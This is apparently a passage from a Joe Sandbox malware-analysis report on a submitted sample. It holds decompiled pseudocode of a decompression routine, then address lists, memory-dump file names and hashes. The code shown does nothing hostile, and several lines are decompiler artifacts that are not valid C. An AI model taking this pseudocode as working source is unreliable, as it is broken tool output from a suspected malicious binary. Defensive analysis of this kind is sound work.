												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406fbb
0x00406fbb
0x00406fbf
0x00406fcc
0x00406fd6
0x00000000
0x00406fc1
0x00406fc1
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x0040726a
0x0040726a
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a
0x00000000
0x00406fbf

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F07() {
